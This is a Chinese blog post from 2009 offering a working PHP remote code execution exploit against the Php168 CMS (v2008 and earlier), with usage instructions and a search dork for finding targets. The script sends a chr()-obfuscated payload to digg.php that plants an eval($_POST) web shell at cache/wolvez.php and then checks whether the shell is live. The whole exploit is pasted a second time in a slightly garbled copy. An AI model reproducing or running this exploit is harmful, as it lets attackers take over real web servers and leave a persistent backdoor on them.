Php168一个很早的漏洞的EXP

2009年11月12日 | category

工具收集| 坏人咖啡

利用代码：
&lt;?php

print_r('
+---------------------------------------------------------------------------+
Php168 &lt;= v2008 remote code execution exploit
by puret_t
mail: puretot at gmail dot com
team: <a href="http://www.wolvez.org/">http://www.wolvez.org</a>
dork: "Powered by PHP168"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc &lt; 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to php168
Example:
php '.$argv[0].' localhost /php168/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$cmd = 'makehtml=1&amp;chdb[htmlname]=${${fputs(fopen(chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(119).chr(111).chr(108).chr(118).chr(101).chr(122).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(112).chr(117).chr(114).chr(101).chr(116).chr(95).chr(116))}}';
$shell = 'http://'.$host.$path.'cache/wolvez.php';
/**
 * wolvez.php has this code:
 * &lt;?eval($_POST[c])?&gt;
 */
send($cmd);

if (!file_get_contents($url) &amp;&amp; file_get_contents($shell) == 'puret_t')
    exit("Expoilt Success!\nView Your shell:\t$shell\n");
else
    exit("Exploit Failed!\n");
   
function send($cmd)
{
    global $host, $path;
   
    $message = "POST ".$path."digg.php  HTTP/1.1\r\n";
    // $message = "POST ".$path."login.php  HTTP/1.1\r\n";
    // $message = "POST ".$path."search.php  HTTP/1.1\r\n";
    // $message = "POST ".$path."sendpwd.php  HTTP/1.1\r\n";
    // $message = "POST ".$path."showsp.php  HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: <a href="http://$host$path/r/n">http://$host$path\r\n</a>";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
   
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
   
    $resp = '';

    while ($fp &amp;&amp; !feof($fp))
        $resp .= fread($fp, 1024);
   
    return $resp;
}

?&gt;

利用代码：

<?php

print_r('

+---------------------------------------------------------------------------+

Php168 <= v2008 remote code execution exploit

by puret_t

mail: puretot at gmail dot com

team: <a href="http://www.wolvez.org/">http://www.wolvez.org</a>

dork: "Powered by PHP168"

+---------------------------------------------------------------------------+

');

/**

* works regardless of php.ini settings

if ($argc < 3) {

print_r('

+---------------------------------------------------------------------------+

Usage: php '.$argv[0].' host path

host: target server (ip/hostname)

path: path to php168

Example:

php '.$argv[0].' localhost /php168/

+---------------------------------------------------------------------------+

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$host = $argv[1];

$path = $argv[2];

$cmd = 'makehtml=1&chdb[htmlname]=${${fputs(fopen(chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(119).chr(111).chr(108).chr(118).chr(101).chr(122).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(112).chr(117).chr(114).chr(101).chr(116).chr(95).chr(116))}}';

$shell = 'http://'.$host.$path.'cache/wolvez.php';

/**

* wolvez.php has this code:

* <?eval($_POST[c])?>

send($cmd);

if (!file_get_contents($url) && file_get_contents($shell) == 'puret_t')

exit("Expoilt Success!\nView Your shell:\t$shell\n");

else

exit("Exploit Failed!\n");

function send($cmd)

{

global $host, $path;

$message = "POST ".$path."digg.php HTTP/1.1\r\n";

// $message = "POST ".$path."login.php HTTP/1.1\r\n";

// $message = "POST ".$path."search.php HTTP/1.1\r\n";

// $message = "POST ".$path."sendpwd.php HTTP/1.1\r\n";

// $message = "POST ".$path."showsp.php HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Referer: <a href="http://$host$path/r/n">http://$host$path\r\n</a>";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $host\r\n";

$message .= "Content-Length: ".strlen($cmd)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $cmd;

$fp = fsockopen($host, 80);

fputs($fp, $message);

$resp = '';

while ($fp && !feof($fp))

$resp .= fread($fp, 1024);

return $resp;

}

所属分类: 工具收集
Tags: 0DAY, php168, 漏洞

« Windows 7 / Server 2008R2 Remote Kernel Crash

今天光棍节 »

没有评论

暂无评论

RSS feed for comments on this post.

对不起，该文章的评论被关闭了！

Php168一个很早的漏洞的EXP

没有评论

文章分类

热门标签

随机文章

文章归档

Users